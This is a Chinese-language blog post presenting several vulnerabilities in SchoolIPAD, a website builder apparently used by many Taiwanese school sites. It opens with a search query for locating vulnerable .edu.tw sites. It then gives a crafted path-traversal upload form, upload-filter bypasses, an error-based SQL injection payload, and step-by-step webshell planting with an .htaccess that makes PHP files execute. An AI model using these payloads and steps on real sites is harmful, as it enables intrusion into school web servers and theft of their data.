n0elle's Blog

台湾某流行商业建站系统SchoolIPAD多个高危安全漏洞

建站系统特征： inurl:.edu.tw/files filetype:php 找到约 14,900,000 条结果  （用时 0.13 秒） 关键字还有/bin/home.php等 厂商：HeimaVista Inc 漏洞上报：Silic Security核心技术人员Gale 1,后台部分组件绕过漏洞 后台部分组件自带cookie操作技能，可通过该处绕过登陆使用一部分组件，高危，详情不披露 2,文檔系統任意目录上传漏洞 文档系统的上传表单名称为Form1，此处对Category的变量未作限定，可更改input框 <option id="cat_4"  selected  value="../../../"> 将文件直接上传到网站根目录。   也可本地构造表单例如： <form name="Form1" action="http://域名/admin/filemanage.php?Programid=filemt" enctype="multipart/form-data" method="post"> <input type="text" name="Category" value="../../../" /> <input type="file" name="UpPict" size="24" /> <input type="submit" name="AddHp" value="上传" /> <input type="hidden" name="BigClass" /> <input type="hidden" name="Par" /> <input type="radio" name="UnZip" value="1" id="confirmyes" checked> <input type="hidden" value="" name="Controlaction" value="Upload" /> 就可以得到如上图的示范。 3,上传组件过滤不严 上传.php将被重命名为.php.txt，部分版本不过滤.PhP，将多个php放入zip压缩包后也可上传并自动解压。 最绝的是，如果后缀名为.php.aaa.fdfdfsd;fadfsdf.gif.xxxxxxxxxxx这样的未知后缀，系统将不自动重命名，如果有解析漏洞。。。 4,打包组件注入漏洞 打包组件使用的是ajax的一个javascript函数，函数在页面的引用： function downByPar(key) {    fm_editor.sajaxSubmit('Op=downByPar&Par='+key,'','fm_editor.callBack'); } 这里的key是文件夹的序号。虽然文件夹名称等可以自定义，但是php在99%的情况下无权限重命名文件夹，因此这里是创建一个以1,2,3,4。。为序号的文件夹，然后编入数据库，名称与序号在数据库中排列 这里操作数据库的地方过滤不严，因此产生多类注入，部分可读写文件并取得webshell。 测试方法可以在地址栏输入 javascript:downByPar("4 union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select user() from information_schema.tables limit 0,1),0x3a)a from information_schema.tables group by a)b"); 就能得到数据库报错信息 也可以用联合查询，测试字段多是为5 6,getshell漏洞 新建一个文件夹，将webshell放到里面，然后压缩为zip在后台的文件部分上传，上传后系统将自动解压，webshell不会被重命名。如果目录不可执行(403或500)，可附带一个.htaccess，内容如下： Options -ExecCGI AddHandler cgi-script .php 或者建立一个style文件夹，在文件夹中放入一个style.css，然后在style文件夹新建images文件夹，images文件夹放入webshell，在模板处新建模板即可获得webshell

本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自n0elle's Blog，原文地址《台湾某流行商业建站系统SchoolIPAD多个高危安全漏洞》
标签： injection • javascript • PHP • upload
喜欢 | 0
分享：